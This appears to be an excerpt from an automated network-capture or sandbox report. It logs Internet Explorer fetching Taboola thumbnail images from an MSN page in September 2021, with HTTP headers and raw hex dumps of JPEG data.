                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC25INData Raw: 1d 5a 28 11 cb 76 44 8f 56 f6 73 22 6f 4e 22 3f aa 2b b3 f4 9e 98 e9 32 ea 6a fc e8 16 51 46 cf fa 94 b1 b9 6c 76 c6 89 07 af c0 7c 3d 2b e9 05 bc 28 f9 aa ae 4c b2 6a 0b a8 b1 31 d4 ef e6 21 3e f3 10 81 87 10 70 26 c9 f3 98 82 61 cb 98 94 5b a2 19 d3 34 88 46 25 73 5b d4 90 b9 a2 98 08 0b a7 d6 d7 27 1e 1b cb 69 d6 2f ec a4 97 39 e4 27 22 23 4a 92 85 7d 31 36 5d 61 1c 22 3f 88 64 2e 35 26 cb 9b e0 63 bf 37 a7 9b 13 d2 8e 64 fa ed 6f 93 54 05 d4 9b f8 fa dc a3 24 4e fe cc cb 62 44 37 88 41 8a 95 a9 45 da b9 78 aa ed 9a a4 70 e7 83 63 29 85 18 35 70 dd 24 04 c2 4e 4b c2 48 2d e9 82 85 32 9d c4 fa 4b 88 30 23 94 d3 10 72 18 9f bf 38 cf c9 b8 c8 c1 12 76 e4 29 c3 b3 c8 28 65 44 04 dd b3 a3 dc 26 cb a7 1e 8b 7c e8 fb 5a d7 76 13 0d 80 a4 c6 06 83 d7 2d c7 c4
                                                                                                                                                                                                                                  Data Ascii: Z(vDVs"oN"?+2jQFlv|=+(Lj1!>p&a[4F%s['i/9'"#J}16]a"?d.5&c7doT$NbD7AExpc)5p$NKH-2K0#r8v)(eD&|Zv-
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC26INData Raw: ab 6b e6 05 7a d1 ad da 45 59 39 c2 1d 47 3a d1 8b 75 28 88 ac 20 89 4a 92 c5 00 28 90 58 30 4b 9c 55 d8 98 fe ec 5c 73 c7 94 1d 26 06 2f 26 a4 c0 3d 7e 91 57 51 26 4c 88 d8 80 42 81 53 c5 48 02 18 e5 a9 4e 03 c8 5e 29 45 9d 82 92 6a d8 29 3a d6 ef 6c 94 91 60 76 12 da 96 f1 16 57 60 a3 7d 45 0a 84 1e bc 41 70 6c 0b 7d 58 ba fc 17 dd ea e3 cf bb 6b c2 cd ca 05 06 29 ec a5 d2 0f a6 2d b6 e0 7c d0 4d e8 c2 55 ba ba d8 34 d5 4e 78 a8 08 1e b1 7a 88 b2 b4 32 81 37 29 bc 37 8c db 75 01 f6 c2 9f 99 9a b0 49 2c fa 62 50 9e f9 aa 59 48 48 d3 da 20 d9 2a 4e b0 fa d6 90 94 35 8a 2e 5e 6e 79 94 34 33 68 2e 9a a0 48 d5 33 ce ca 23 d3 fd 01 b7 b0 c4 eb 9a 6c 20 94 5b 46 11 22 14 00 00 bf 48 7d c3 8a 27 ce 39 6b de 03 e2 e9 50 60 bc 92 ae 1d 9e 4e 48 eb 3c 64 8b 04 5b
                                                                                                                                                                                                                                  Data Ascii: kzEY9G:u( J(X0KU\s&/&=~WQ&LBSHN^)Ej):l`vW`}EApl}Xk)-|MU4Nxz27)7uI,bPYHH *N5.^ny43h.H3#l [F"H}'9kP`NH<d[
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC27INData Raw: 2a 20 39 da f1 be 17 0d d0 e8 71 6a f4 d7 6f 88 c7 a8 ce 6e 65 3a 4c fa ec bd e0 00 00 06 d2 ba 1f 30 fa e1 98 78 59 7a df 0a 4b fa 8e 15 1b 4b 40 42 ae 5b eb 68 a1 d6 e6 f2 d2 a3 25 ac 12 c4 1d 4c 64 a3 64 52 b6 2c 37 11 d0 a3 15 31 06 66 02 75 30 fe bf 78 a7 2d 8d b5 0b fd e6 b7 bf 5b c2 73 a8 37 24 9d 32 ca 4c a6 f4 ad a5 b7 8a 4d f2 36 e3 63 dc 41 bc 3c 39 bd d9 94 5c c5 a1 4d 77 f8 8f 23 d0 07 50 6d 3c 07 ee 27 86 a9 a9 37 80 dc 42 d9 44 cc 6f 79 a9 83 cb bc bc 6d db de 57 da 97 b4 ae 3f 2c f7 59 c3 0f 8c 9e cb 18 58 c3 bb fb c3 b7 f2 ff 00 7c 28 b0 0d 63 e5 32 a2 30 66 1d 0e de c2 2b 86 40 09 b3 6e 0c 0d 7d 1b 46 84 86 ab ae cb d2 0a a2 d7 22 06 43 b3 08 48 02 e4 e9 0b 28 17 27 49 99 7b c6 aa 06 c2 16 2c 62 36 5f 68 49 27 0d 85 e5 2d 56 d1 86 b1 b7
                                                                                                                                                                                                                                  Data Ascii: * 9qjone:L0xYzKK@B[h%LddR,71fu0x-[s7$2LM6cA<9\Mw#Pm<'7BDoymW?,YX|(c20f+@n}F"CH('I{,b6_hI'-V
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC29INData Raw: 27 41 0e 86 d0 0b 08 7e 48 24 10 44 4a b9 d7 d6 55 fc d7 f7 c6 dc a7 93 30 07 d4 42 d9 dc 1b 60 79 6d ca 8d 95 81 95 28 07 4c e3 78 11 ff 00 69 96 23 71 68 07 29 e4 02 e7 51 17 cc 30 3f 2d 1d 8a 65 be d1 ea 30 d0 19 72 77 d6 3e 64 d0 4f ff c4 00 41 11 00 02 01 02 04 03 05 05 05 05 07 04 03 00 00 00 01 02 00 03 11 04 12 21 31 10 41 51 13 20 22 32 71 30 42 52 61 81 05 72 91 a1 d1 14 23 62 b1 c1 15 24 43 53 92 b2 e1 25 33 34 82 45 83 84 ff da 00 08 01 02 01 01 3f 00 e3 ac 36 e3 78 a4 de 30 b8 30 79 87 0e 7c 2f c4 18 0e a3 85 5d 1e 0e 27 bc a2 11 6e 20 d9 b8 01 e2 e0 61 96 26 66 a6 37 a8 83 d5 84 ed 28 9f f1 a9 ff 00 a8 45 17 f2 90 7d 0d e6 a0 8e 15 bc c2 06 80 cb f7 f9 08 46 9c 5b 43 39 4f 7a 09 57 1d 87 a6 6c b7 a8 df 2d bf 19 53 1d 88 7d 88 41 fc 22 31 67
                                                                                                                                                                                                                                  Data Ascii: 'A~H$DJU0B`ym(Lxi#qh)Q0?-e0rw>dOA!1AQ "2q0BRar#b$CS%34E?6x00y|/]'n a&f7(E}F[C9OzWl-S}A"1g
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC30INData Raw: 6e 55 14 18 75 12 b6 ae 1c 6d 50 66 fa f3 fc fb 94 69 1a f5 56 98 db 76 3d 04 00 00 00 16 02 63 71 1d 95 3c 8a 7c 6c 34 f9 0e b3 0c 41 c3 d2 b7 c0 07 0b ff 00 7d ff 00 d7 86 20 81 87 ab f7 0c b4 22 55 19 56 9a 74 19 8f ab 4b cc 1a f6 78 5a 69 ce d7 3f 5d 7b d7 e1 f6 9d 2c f4 16 a5 ae 69 36 a3 aa 99 89 ad 87 a8 e8 69 53 c8 00 d7 4b 5e 27 ef 29 b5 3f 79 6e e9 fd 47 1a 58 1c 4d 4b 5c 04 5e a7 53 28 61 e9 d0 4c a8 3d 49 dc cc 4e 32 9d 01 61 e2 a9 c9 7f 58 59 dd cb b9 bb 1d e6 02 b8 17 a2 c7 9d d3 f4 e1 d9 3f ed 79 ed e1 c9 bf cf 86 2e a0 23 b3 1f fb 42 25 34 05 ae de 55 d4 c7 0e d9 aa 10 75 6d e1 ec 31 0d 42 9a 52 ca 47 98 fc 84 56 b3 6b 29 ab de ec f7 04 68 3a 40 d5 ef 51 95 ae 15 8d c1 88 e2 a2 06 12 ab 8a 74 d9 cf 28 0f 84 7a 4f 86 54 a6 b5 7c 24 9b 66 e5
                                                                                                                                                                                                                                  Data Ascii: nUumPfiVv=cq<|l4A} "UVtKxZi?]{,i6iSK^')?ynGXMK\^S(aL=IN2aXY?y.#B%4Uum1BRGVk)h:@Qt(zOT|$f
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC32INData Raw: cc c0 ad 2c 3a 09 61 d2 7d 3b d8 9b f8 20 52 60 4e a0 c2 06 68 b0 66 e4 26 57 3c ed 3b 2e ad 05 34 11 45 bd d9 af 76 fe ce a7 bb 35 eb 35 eb c1 6d 01 3e ce de ca b1 b6 59 9a 5e 21 bb 08 05 bd 88 04 cc a6 6d 2a 5c ad 84 19 f4 b7 b1 c4 5e e9 f5 96 33 29 81 48 97 d0 41 32 1e e1 36 99 b8 5e 5f 81 da 0c c4 fb 1a a2 e5 66 43 32 19 90 75 8b bd b8 03 78 66 71 33 77 ed c0 b5 4e 5f 4e 77 80 df bf 51 f2 b0 13 3c cd 2f 09 d4 41 a1 06 73 e1 6e e8 ee 19 9c 2a e4 20 dc 6d 29 dc b3 30 16 53 cb e6 3b f5 fc e3 d2 00 65 a0 88 b6 37 3c 2e 36 33 6e f0 22 fc 04 08 4e a7 48 40 06 0f 31 3a df 90 8a 32 a8 1d fa 83 c5 f4 e0 a8 0c 0a 07 16 97 6e 46 0a b6 f3 2f d4 4b 86 d4 11 2f 35 e8 65 8f 48 2d 02 d3 b5 fc 46 5e 13 c3 b4 5e 96 99 c5 ed 68 f5 42 84 39 49 cd 11 b3 0d 88 23 70 7b b5
                                                                                                                                                                                                                                  Data Ascii: ,:a}; R`Nhf&W<;.4Ev55m>Y^!m*\^3)HA26^_fC2uxfq3wN_NwQ</Asn* m)0S;e7<.63n"NH@1:2nF/K/5eH-F^^hB9I#p{
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC33INData Raw: 56 db 7b 7a 38 67 3d 7b 98 73 d5 c8 ea 7a 2d 45 65 61 6e 08 8e 08 c7 19 3c 96 63 d5 98 9e 49 3c 93 40 05 04 b3 1e 00 03 c4 9a b5 d4 ed 95 ca c9 da 6b f6 68 f4 74 28 e5 1c 5b 08 fe d2 f9 d7 1f d5 e2 2f fd 4a be ed 95 c8 28 e6 0b e2 21 d2 d1 d7 ff 00 0b 4d 8b 10 10 33 c1 94 48 fe f6 a8 6d 2d 60 4d 91 5b c1 1a c5 1c 6a 3c 15 57 00 0a 63 f3 a3 4c 3e 75 6d 35 ec 65 4c 5a 8c 59 b6 bd 88 af 4e ee ea 12 92 a7 c9 ab f9 51 60 b8 ce 9f a9 ba 43 a9 46 a3 fd 9e f5 40 49 7c 96 70 09 f1 92 a5 4b ab 32 8b 7d a7 5c c6 61 bc b3 67 19 0b 3c 27 91 9f 06 19 56 f0 27 d1 95 fe 1f 52 38 9e 18 01 78 dd c2 02 13 03 ec f3 d4 9e bb 7a d2 c7 b8 f0 cd d0 1f 0c fb 86 69 9c db 3f b4 bb 8c 4c ca 1b 73 46 fc 1e bc 80 7a 8c d6 67 90 4d 6f 6d c7 0f 71 74 a4 48 c0 7b a3 42 7a 7d d6 2b 5c 18
                                                                                                                                                                                                                                  Data Ascii: V{z8g={sz-Eean<cI<@kht([/J(!M3Hm-`M[j<WcL>um5eLZYNQ`CF@I|pK2}\ag<'V'R8xzi?LsFzgMomqtH{Bz}+\
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC34INData Raw: 50 d9 fd fe 13 79 8f 7e ca 7e c4 f6 8e f9 f6 58 bf 7a 25 b2 ba 93 c1 04 98 8c 09 1c f4 47 1e 41 a8 2c a9 ce 47 2a ea 7a 32 9f 10 7d 0c d2 e8 71 34 7a b2 22 82 d7 5a 3b 9c ce 0f bc db 1f b7 4f 81 5f 1a 57 46 01 91 d4 e5 59 5b 90 41 1d 41 a4 72 f1 18 e4 89 c6 55 86 72 0f c4 55 a1 c8 e7 d9 fa 9f 6b 32 e2 31 f9 63 ea 4f eb 54 76 bd d5 cd e5 d6 9d aa bc c8 90 a9 9c 23 3d ac e9 28 d9 86 31 02 92 1e 41 a9 9e c3 57 ed d6 b1 ad 43 6d 1d b0 91 cd 89 9a 66 5d b1 bb 43 91 2f 78 ae 72 47 5a d4 62 2c 0f fa a7 4b 51 ef e4 cd eb 34 f6 7f ca 1d 59 e2 87 7c 76 a8 ed 6d 61 98 c7 16 90 c0 b8 ef 0b d7 53 5b c6 b9 a9 b5 86 9a 77 ee 09 a5 e8 ce f6 d1 6d f2 96 6e f6 7f 30 e3 d1 93 42 38 e7 b6 4d 47 b4 52 a1 e5 c1 6f b0 b6 fd db dc 11 f9 29 4f ab f6 2a ed e1 ff 00 c8 c6 ee d9 28
                                                                                                                                                                                                                                  Data Ascii: Py~~Xz%GA,G*z2}q4z"Z;O_WFY[AArUrUk21cOTv#=(1AWCmf]C/xrGZb,KQ4Y|vmaS[wmn0B8MGRo)O*(
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC36INData Raw: 91 ce 4b cb ec 1d e4 f8 96 ab 4d 20 6a 9d a0 13 db e9 b6 70 2c 10 0b 3b 38 dd 9c 04 4c 00 37 ca 86 9d ed ef 2f 52 6d 4d d4 91 dd 58 c0 77 ce db 80 3b 49 40 42 7b d8 81 5b 2d 7b 49 7f 3d c5 e9 43 8d f0 69 bb 0a 44 47 e4 67 94 3d 7d 9b dd 42 84 0f 71 6c 57 f5 78 ff 00 96 80 8d 75 1b a5 0b e4 1c 8c 53 4b 1f 65 75 18 2f 2c 1d 8f dc 86 ff 00 7b 98 90 79 3c 4c df 17 f4 b3 1d 13 b3 3a c6 a7 30 f0 49 2f a5 82 d6 d8 9f 36 55 98 0f 40 ef 45 e4 72 c6 4f b8 00 3d 39 e6 bc 68 1d bc e3 38 ac 30 53 b5 40 f6 48 3e 35 80 c8 54 81 ce 33 5b a7 ec fe a7 77 62 e3 c7 bb 95 bd 62 23 f0 c4 9b 45 10 33 c8 61 d4 53 34 fd 91 d4 66 d1 8e e2 32 6d 63 02 5b 07 f9 da c9 1f cf 3f 50 85 fb d2 b7 e5 41 d7 e6 7a 0a 13 e8 3d 9c 87 e8 ad 23 ba 6d f1 dc 3a 1c cd 3a 60 90 77 bf 0a cb d5 02 d0
                                                                                                                                                                                                                                  Data Ascii: KM jp,;8L7/RmMXw;I@B{[-{I=CiDGg=}BqlWxuSKeu/,{y<L:0I/6U@ErO=9h80S@H>5T3[wbb#E3aS4f2mc[?PAz=#m::`w
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC37INData Raw: b9 8c 9f 55 d4 63 8f ad cd 83 3f 2c 9e 2f 19 f6 e3 e8 78 e4 c3 69 69 fa 3c b6 2f a7 69 77 44 c3 35 dd ed c2 7d be a8 62 90 ae 60 b7 43 b2 27 c1 19 25 c1 a6 d2 ad bb 4b ac dc db e8 8b b5 dd e5 b3 1b e4 8a ee e1 48 1d ca 18 62 32 bb 7d c4 4e 49 ad 33 5b 4b 67 09 39 b0 ba 8e e3 ba 2d 9c 6f d8 4e 33 8e 2a df 4d b1 b6 68 c4 d7 57 2e 23 8a 33 2b 88 d3 73 1e 06 59 80 a8 b4 fd 3b 4e 8b bc ba ba 97 3b 23 5c 85 1d 32 49 24 80 00 e4 9a 5f 56 30 89 7b f2 76 a0 8c 8d db 89 38 c0 c7 35 7d da ad 5f bf bb 8a 4d 2f 40 8e 3b d9 e1 36 21 0d c1 9d 8b a4 71 08 cc 8a a7 7b 02 58 80 2a d2 d3 e8 7d 26 1b ed 27 b3 d2 db 45 3a f6 96 d6 49 1d 26 5b bf 5a 8d 64 8f 98 9a d5 e3 4d bd d4 b9 dc c6 96 0e c2 e9 d6 76 d7 bd 9b d7 6f a6 48 e4 8f 4c b9 07 16 17 6a 5d c8 9e c9 87 73 9e 8e 36
                                                                                                                                                                                                                                  Data Ascii: Uc?,/xii</iwD5}b`C'%KHb2}NI3[Kg9-oN3*MhW.#3+sY;N;#\2I$_V0{v85}_M/@;6!q{X*}&'E:I&[ZdMvoHLj]s6
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC38INData Raw: 2e 5a 44 31 64 fd d4 5e a1 10 78 28 ac 6e 53 f2 23 a1 ad cc 90 0c 9f 31 47 19 a0 a2 79 e5 75 00 60 00 ec 48 e0 f4 a2 5e ca 16 52 24 8d 80 24 9e 55 83 75 56 15 3d 8e a7 24 40 cd 6e f1 33 a4 ad ee 2e 83 1b bd cd e3 e2 05 5d 49 63 a3 e9 ef 01 69 e3 d8 e5 c8 48 97 3d 79 d9 0a f4 e2 af 86 b1 a3 6b af 7b 0c dd da 1b 6d 92 49 31 eb bf 77 49 c8 ab dd 66 f3 48 d1 d2 d6 27 bc b6 b6 ee d4 88 95 24 d8 cc ee 46 ed 95 a7 eb 42 c2 f6 5b c8 ee ef 2e 43 22 bc 93 34 99 10 98 5f 9d ac 53 3b a8 92 42 0f 8e 1c 56 08 81 cf f0 f4 cf a7 c9 70 e0 5c 42 b8 78 2e 00 f0 96 26 ca b5 1d 37 52 4b f3 74 35 2b 25 79 6d 64 b8 8e 06 b4 59 a7 89 4e fd cb 1b 6d 42 43 95 ae ca eb 3d 88 81 2d 2d a5 bf b2 79 4e af 26 9d 6c ca e9 67 2c 29 88 e3 90 85 d8 d2 e7 a7 3b 29 5f 4e b7 ec ae 9d 61 a7 47
                                                                                                                                                                                                                                  Data Ascii: .ZD1d^x(nS#1Gyu`H^R$$UuV=$@n3.]IciH=yk{mI1wIfH'$FB[.C"4_S;BVp\Bx.&7RKt5+%ymdYNmBC=--yN&lg,);)_NaG
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC40INData Raw: 33 93 d0 b1 a2 66 56 e0 54 00 f8 12 6a da 27 8a 1d d1 20 5c ee 35 60 44 4a 09 0e 2b 4d d8 fb 49 1b 07 50 6a ec 02 fb f0 26 7f bc 09 21 ba f5 e4 d5 e3 82 92 26 0c ee 46 d9 49 2e 3a f4 62 c4 b0 f1 cd 5c ee 4c 85 6e f9 fd 9c 90 dc 73 c7 23 34 49 24 64 92 79 ae 5d 82 91 e1 93 c5 26 0b b6 d1 8d bf 1c 75 e0 67 ad 60 8c fe da c1 f5 83 c7 96 da 08 5a 2b 08 f0 7c 72 64 34 8b fa e2 82 8c 9e 37 83 4b 2f ab 95 38 cd 5a 5a 2e df 6b db 05 85 4d 74 fe 21 72 6a 5b ad bd 1e 77 e0 fc 85 59 da 21 18 e2 3c 9a 9c ae 7a 2b 6d 14 3d 6c da bc 84 00 c5 43 0e 88 d5 6b 22 44 80 48 0f f5 be f2 69 6d a2 77 25 22 5e 88 0f 87 a2 36 ef d4 a9 72 b9 20 1f 77 a3 0a 78 eb 5f 1a 45 73 9c 86 e3 18 f4 f5 f4 27 27 82 73 91 83 41 54 f4 c6 3a 2e 40 cf bb 23 d1 d6 76 fd c2 a6 c6 9c 74 8e e8 23 95
                                                                                                                                                                                                                                  Data Ascii: 3fVTj' \5`DJ+MIPj&!&FI.:b\Lns#4I$dy]&ug`Z+|rd47K/8ZZ.kMt!rj[wY!<z+m=lCk"DHimw%"^6r wx_Es''sAT:.@#vt#
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC41INData Raw: 6d 92 33 57 da 9d db bb 06 b9 bc 9d e7 95 80 3e 2f 21 24 fa 1e 43 eb 53 e0 0f 32 2b 1d d7 11 c3 e7 46 49 e5 40 38 1c 22 8f 13 57 13 dd 11 97 48 8e d5 5a bc 7f 8c 94 8e eb d1 e4 f6 8d 05 51 d0 01 80 3e af 35 32 41 71 1e c7 44 3b 57 77 e6 34 f1 5b 59 89 21 93 2d 9d db 0e 07 c7 34 17 ec c9 c0 f0 c9 fe 83 fa c7 ae 91 bf f0 ae 0c 8f fc 7d 00 5d 4f 2d f6 e7 f8 4e c8 2b 77 ac cc 4a 92 3d fd 05 0f 5a bc e4 bf 88 4f 00 3f a2 0c 8e b8 35 98 5c e6 37 af c0 7f a0 19 c9 fd e7 34 78 85 cf ee ae ac c6 bc 0d 3c d6 d7 b1 6a 45 64 51 e2 2f e6 15 dd 34 72 e7 7b 0c 74 ae 11 42 8f 97 f4 63 70 04 a1 f3 ac 18 8e d0 94 ed f2 a9 51 3f 31 5e 3e b7 97 ec af ea 1e b3 9f ff 00 75 e1 50 cb 67 36 9b 34 91 40 72 0a 3c 97 32 bb 54 29 3c 64 b1 75 23 a7 f4 aa f2 4e 7d a2 6b 8a 47 8d 97 0c
                                                                                                                                                                                                                                  Data Ascii: m3W>/!$CS2+FI@8"WHZQ>52AqD;Ww4[Y!-4}]O-N+wJ=ZO?5\74x<jEdQ/4r{tBcpQ?1^>uPg64@r<2T)<du#N}kG


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  5192.168.2.749777151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC16OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F26b7c43e8735f7408c60e41fb7e91ecd.jpg HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: img.img-taboola.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC41INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 15272
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  edge-cache-tag: 493642289073061537158285669850804200228,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                                                                                                                                                                                                  etag: "3d15488c4e13b562df2958c9c5dfbc8a"
                                                                                                                                                                                                                                  expiration: expiry-date="Tue, 24 Aug 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                                                                                                                                                                                                  last-modified: Sat, 24 Jul 2021 05:23:43 GMT
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  x-ratelimit-limit: 101
                                                                                                                                                                                                                                  x-ratelimit-remaining: 100
                                                                                                                                                                                                                                  x-ratelimit-reset: 1
                                                                                                                                                                                                                                  x-envoy-upstream-service-time: 9
                                                                                                                                                                                                                                  X-backend-name: US_DIR:3FP7YNX3LMizprTZsG7BSW--F_US_nlb103
                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:43 GMT
                                                                                                                                                                                                                                  Age: 1641675
                                                                                                                                                                                                                                  X-Served-By: cache-wdc5553-WDC, cache-dca17720-DCA, cache-hhn4042-HHN
                                                                                                                                                                                                                                  X-Cache: HIT, HIT, HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1, 1, 1
                                                                                                                                                                                                                                  X-Timer: S1631265103.363562,VS0,VE1
                                                                                                                                                                                                                                  Vary: ImageFormat
                                                                                                                                                                                                                                  X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F26b7c43e8735f7408c60e41fb7e91ecd.jpg
                                                                                                                                                                                                                                  X-vcl-time-ms: 1
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC43INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 0f 40 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0f 30 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e5 00 01 00 01 00 03 00 0f 00 14 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 04 18 63 70 72 74 00 00 05 cc 00 00 00 23 77 74 70 74 00 00 05 f0 00 00 00 14 72 58 59 5a 00 00 06 04 00 00 00 14 67 58 59 5a 00 00 06 18 00 00 00 14 62 58 59 5a 00 00 06 2c 00 00 00 14 72
                                                                                                                                                                                                                                  Data Ascii: JFIF@ICC_PROFILE0applmntrRGB XYZ acspAPPLAPPL-appldescPbdscmcprt#wtptrXYZgXYZbXYZ,r
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC44INData Raw: 00 43 00 44 00 20 00 43 00 6f 00 6c 00 6f 00 72 00 69 00 64 00 6f 00 4b 00 6f 00 6c 00 6f 00 72 00 20 00 4c 00 43 00 44 03 88 03 b3 03 c7 03 c1 03 c9 03 bc 03 b7 00 20 03 bf 03 b8 03 cc 03 bd 03 b7 00 20 00 4c 00 43 00 44 00 46 00 e4 00 72 00 67 00 2d 00 4c 00 43 00 44 00 52 00 65 00 6e 00 6b 00 6c 00 69 00 20 00 4c 00 43 00 44 30 ab 30 e9 30 fc 00 4c 00 43 00 44 00 4c 00 43 00 44 00 20 00 61 00 20 00 43 00 6f 00 72 00 65 00 73 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 41 70 70 6c 65 20 49 6e 63 2e 2c 20 32 30 32 31 00 00 58 59 5a 20 00 00 00 00 00 00 f0 cf 00 01 00 00 00 01 19 11 58 59 5a 20 00 00 00 00 00 00 80 c2 00 00 3c 4b ff ff ff b9 58 59 5a 20 00 00 00 00 00 00 4e 49 00 00 b5 e8 00 00 0a e9 58 59 5a 20 00 00 00 00 00 00 27 cb 00 00 0d
                                                                                                                                                                                                                                  Data Ascii: CD ColoridoKolor LCD LCDFrg-LCDRenkli LCD000LCDLCD a CorestextCopyright Apple Inc., 2021XYZ XYZ <KXYZ NIXYZ '
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC45INData Raw: 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45 12 45 55 45 9a 45 de 46 22 46 67 46 ab 46 f0 47 35 47 7b 47 c0 48 05 48 4b 48 91 48 d7 49 1d 49 63 49 a9 49 f0 4a 37 4a 7d 4a c4 4b 0c 4b 53 4b 9a 4b e2 4c 2a 4c 72 4c ba 4d 02 4d 4a 4d 93 4d dc 4e 25 4e 6e 4e b7 4f 00 4f 49 4f 93 4f dd 50 27 50 71 50 bb 51 06 51 50 51 9b 51 e6 52 31 52 7c 52 c7 53 13 53 5f 53 aa 53 f6 54 42 54 8f 54 db 55 28 55 75 55 c2 56 0f 56 5c 56 a9 56 f7 57 44 57 92 57 e0 58 2f 58 7d 58 cb 59 1a 59 69 59 b8 5a 07 5a 56 5a a6 5a f5 5b 45 5b 95 5b e5 5c 35 5c 86 5c d6 5d 27 5d 78 5d c9 5e 1a 5e 6c 5e bd 5f 0f 5f 61 5f b3 60 05 60 57 60 aa 60 fc 61 4f 61 a2 61 f5 62 49 62 9c 62 f0 63 43 63 97 63 eb 64 40 64 94 64 e9 65 3d 65 92 65 e7 66
                                                                                                                                                                                                                                  Data Ascii: @A)AjAAB0BrBBC:C}CDDGDDEEUEEF"FgFFG5G{GHHKHHIIcIIJ7J}JKKSKKL*LrLMMJMMN%NnNOOIOOP'PqPQQPQQR1R|RSS_SSTBTTU(UuUVV\VVWDWWX/X}XYYiYZZVZZ[E[[\5\\]']x]^^l^__a_``W``aOaabIbbcCccd@dde=eef
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC47INData Raw: da 00 0c 03 01 00 02 10 03 10 00 00 00 c9 82 ea 58 ad 82 46 4b 3b 78 06 32 cd 70 46 6c fd a1 4f 60 af 67 10 2a 78 cc 1b 88 b8 63 16 bf 55 1b b8 44 46 83 9c da 41 c8 03 56 f9 24 7b 9b 20 8b 2c 71 5c 24 c6 c2 25 9f 96 c6 a5 44 e3 af f3 d6 a6 23 7c d9 4d 83 b8 aa 3b 87 02 33 c6 2d 54 76 2a f6 f0 1c 1b 21 80 f3 ba 3d 6d ae 10 fa 4c da 34 ac 54 b5 0c b9 4f 3f 75 ba f3 8e 9e a6 eb b2 d3 6c d2 d7 42 4a 72 ea a5 6e ce 03 d6 66 88 55 2b b4 1f 8d 65 6a 97 be e2 20 30 7a 6a cf 0e ab 6b b7 ba 9e c4 50 db 7a 9e 8c ee 1b e8 0c 56 69 5a d5 29 36 43 55 96 17 d4 48 96 4f 07 d9 61 d4 72 f7 53 d3 57 64 b9 e9 0c bd f2 3a cf b9 5a 8f 85 00 3c 96 42 39 03 df c1 b0 5d ce b0 4f 6a 72 0e 8d 46 08 c7 88 26 a8 06 e2 f6 d7 e9 d7 f4 94 4d 93 ad b6 57 af f3 24 4b 60 af 1a 5a 1d 5d 73
                                                                                                                                                                                                                                  Data Ascii: XFK;x2pFlO`g*xcUDFAV${ ,q\$%D#|M;3-Tv*!=mL4TO?ulBJrnfU+ej 0zjkPzViZ)6CUHOarSWd:Z<B9]OjrF&MW$K`Z]s
